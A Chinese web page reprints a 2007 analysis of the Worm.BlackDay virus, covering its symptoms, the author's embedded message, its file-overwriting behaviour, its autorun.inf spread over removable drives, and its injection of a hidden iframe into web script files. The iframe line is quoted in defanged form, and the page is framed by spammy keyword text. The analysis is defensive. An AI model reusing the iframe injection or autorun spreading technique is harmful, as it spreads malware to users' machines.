国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

專家談 Worm.BlackDay 病毒分析報告
2007-04-30   賽迪網(wǎng)

今日一朋友問起“末日陰影”,還以為是哪部好萊塢大片,細看下來,原來就是Worm/BlackDay這個“老”蠕蟲。其實這個蠕蟲在四月初就出現(xiàn)了,被冠了這么個噱頭名字。

目前這個病毒會影響到除Windows Vista外所有的Windows版本。病毒程序運行后會破壞正常文件,感染網(wǎng)頁文件,通過MS06-014和MS07-017漏洞傳播, 且被病毒破壞的文件無法修復,這點比較危險。





1、當系統(tǒng)中毒后,所有可執(zhí)行文件圖標都變成了一個黑色炸彈的圖標,如下圖:

用戶一旦感染該病毒,電腦會自動彈出一個病毒作者的留言框:

2、病毒體內(nèi)有如下字樣:

I can't change my sanguinary inbeing,never.I canfeel that the tears come by my face.Kill 
my self is the best,maybe.so Please.
My Name:wswhacker My age:17
I feeling free when I am not in prison.Can you feel my word?

(但此段文字在不同的版本里會有些許不同。)

3、該病毒會遍歷本地磁盤、可移動磁盤等存貯介質(zhì),發(fā)現(xiàn)有*.asp *.aspx *.php *.jsp *.htm *.html擴展名的腳本文件時進行感染:

在這些網(wǎng)頁腳本文件中插入一個Iframe標簽,添加惡意網(wǎng)址引用:

(iframe src="hxxp://www.d***youxi.net/Black-Day.htm" width=0 height=0)(/iframe)

當用戶打開這些網(wǎng)頁文件時,IE就會自動下載蠕蟲病毒。

(既然病毒目標是所有本地磁盤,查殺時就要注意全盤掃描。)

4、發(fā)現(xiàn)如下擴展名的文件時,將病毒體內(nèi)容覆蓋到文件首部,使文件被破壞,無法恢復:

.exe .msc .dll .scr .pif .com

發(fā)現(xiàn)如下擴展名的文件時跳過:

.lnk

對于其他文件,當文件大小小于258048(病毒體大小)時,覆蓋文件,否則跳過。感染后的文件末尾加如下感染標志:wswhacker。

5、在每個磁盤根目錄下創(chuàng)建如下病毒文件,雙擊盤符時激活病毒:

autorun.inf
BLACK-DAY.EXE

這樣就可以借助U盤,MP3,移動硬盤等移動存儲介質(zhì)傳播。

此病毒雖然對文件的破壞力比較強,好在傳染性一般。目前還沒有大規(guī)模的中毒報告。

建議開啟文件、網(wǎng)頁等監(jiān)控,可以隨時監(jiān)控病毒對上述文件實施的更改操作。插入移動存儲后,掃描移動磁盤后再運行文件。

【提示:為安全起見,文中用“*”代替了部分網(wǎng)址,并更改了Iframe標簽格式。】

熱詞搜索:

上一篇:在Linux操作系統(tǒng)下如何開啟硬盤DMA二
下一篇:局域網(wǎng)加速的一些問題以及心得體會

分享到: 收藏
主站蜘蛛池模板: 乌兰县| 蒙城县| 云浮市| 彭阳县| 托里县| 富顺县| 博客| 商洛市| 宁河县| 德格县| 八宿县| 嘉定区| 南安市| 札达县| 海南省| 青田县| 格尔木市| 海伦市| 屏东县| 永嘉县| 广饶县| 寿光市| 确山县| 虹口区| 鄂托克旗| 四平市| 武强县| 三台县| 舟山市| 奇台县| 溧阳市| 宜川县| 九江市| 肇源县| 孟津县| 渭南市| 法库县| 津市市| 宁海县| 平顺县| 和硕县|